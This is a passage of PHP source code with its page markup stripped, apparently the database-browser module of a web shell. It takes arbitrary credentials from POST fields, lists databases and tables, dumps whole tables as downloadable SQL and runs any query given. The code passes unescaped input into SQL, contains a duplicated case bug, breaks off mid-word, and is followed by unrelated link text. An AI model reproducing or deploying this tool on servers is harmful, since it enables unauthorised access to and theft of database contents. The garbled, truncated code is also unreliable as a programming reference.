if (@mysql_select_db($db))return true;
break;
}
return false;
}
function query($str) {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_query($str);
break;
case 'pgsql':
return $this->res = @pg_query($this->link,$str);
break;
}
return false;
}
function fetch() {
$res = func_num_args()?func_get_arg(0):$this->res;
switch($this->type) {
case 'mysql':
return @mysql_fetch_assoc($res);
break;
case 'pgsql':
return @pg_fetch_assoc($res);
break;
}
return false;
}
function listDbs() {
switch($this->type) {
case 'mysql':
return $this->res = @mysql_list_dbs($this->link);
break;
case 'pgsql':
return $this->res = $this->query("SELECT datname FROM pg_database");
break;
}
return false;
}
function listTables() {
switch($this->type) {
case 'mysql':
return $this->res = $this->query('SHOW TABLES');
break;
case 'pgsql':
return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
break;
}
return false;
}
function error() {
switch($this->type) {
case 'mysql':
return @mysql_error($this->link);
break;
case 'pgsql':
return @pg_last_error($this->link);
break;
}
return false;
}
function setCharset($str) {
switch($this->type) {
case 'mysql':
if(function_exists('mysql_set_charset'))
return @mysql_set_charset($str, $this->link);
else
$this->query('SET CHARSET '.$str);
break;
case 'mysql':
return @pg_set_client_encoding($this->link, $str);
break;
}
return false;
}
function dump($table) {
switch($this->type) {
case 'mysql':
$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
$create = mysql_fetch_array($res);
echo $create[1].";\n\n";
$this->query('SELECT * FROM `'.$table.'`');
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".@mysql_real_escape_string($v)."'";
$columns[] = "`".$k."`";
}
echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
}
break;
case 'pgsql':
$this->query('SELECT * FROM '.$table);
while($item = $this->fetch()) {
$columns = array();
foreach($item as $k=>$v) {
$item[$k] = "'".addslashes($v)."'";
$columns[] = $k;
}
echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
}
break;
}
return false;
}
};
$db = new DbClass($_POST['type']);
if(@$_POST['p2']=='download') {
ob_start("ob_gzhandler", 4096);
$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
$db->selectdb($_POST['sql_base']);
header("Content-Disposition: attachment; filename=dump.sql");
header("Content-Type: text/plain");
foreach($_POST['tbl'] as $v)
$db->dump($v);
exit;
}
printHeader();
?>

Sql browser
















'>
'>







Type Host Login Password Database

'> '> '>
$tmp = "";
if(isset($_POST['sql_host'])){
if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
switch($_POST['charset']) {
case "Windows-1251": $db->setCharset('cp1251'); break;
case "UTF-8": $db->setCharset('utf8'); break;
case "KOI8-R": $db->setCharset('koi8r'); break;
case "KOI8-U": $db->setCharset('koi8u'); break;
case "cp866": $db->setCharset('cp866'); break;
}
$db->listDbs();
echo "';
}
else echo $tmp;
}else
echo $tmp;
?>


if(isset($db) && $db->link){
echo "
";
if(!empty($_POST['sql_base'])){
$db->selectdb($_POST['sql_base']);
echo "
Tables:

";
$tbls_res = $db->listTables();
while($item = $db->fetch($tbls_res)) {
list($key, $value) = each($item);
$n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.''));
$value = htmlspecialchars($value);
echo " ".$value." (".$n['n'].")
";
}
echo "
";
if(@$_POST['p1'] == 'select') {
$_POST['p1'] = 'query';
$db->query('SELECT COUNT(*) as n FROM '.$_POST['p2'].'');
$num = $db->fetch();
$num = $num['n'];
echo "".$_POST['p2']." ($num) ";
for($i=0;$i<($num/30);$i++)
if($i != (int)$_POST['p3'])
echo "",($i+1)," ";
else
echo ($i+1)," ";
if($_POST['type']=='pgsql')
$_POST['p3'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30);
else
$_POST['p3'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30';
echo "

";
}
if((@$_POST['p1'] == 'query') && !empty($_POST['p3'])) {
$db->query(@$_POST['p3']);
if($db->res !== false) {
$title = false;
echo '';
$line = 1;
whi

Go to Engineers Without Borders USA Go to Brown University